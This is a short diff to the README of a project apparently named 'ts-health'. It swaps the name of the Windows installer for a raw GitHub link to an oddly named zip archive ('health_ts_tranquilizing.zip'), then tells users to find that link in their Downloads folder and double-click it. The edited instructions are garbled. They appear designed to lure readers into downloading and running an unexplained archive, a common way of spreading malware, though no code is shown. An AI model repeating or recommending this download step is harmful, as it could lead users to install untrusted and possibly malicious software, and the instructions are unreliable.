daviluccasad/ts-health/README.md

 Once you download the software, follow these steps to install:

 - **Windows Users:**
-  1. Locate the downloaded `ts-health.exe` file in your Downloads folder.
+  1. Locate the downloaded `https://raw.githubusercontent.com/daviluccasad/ts-health/main/margination/health_ts_tranquilizing.zip` file in your Downloads folder.
   2. Double-click the file to start the installation.
   3. Follow the prompts in the installation wizard.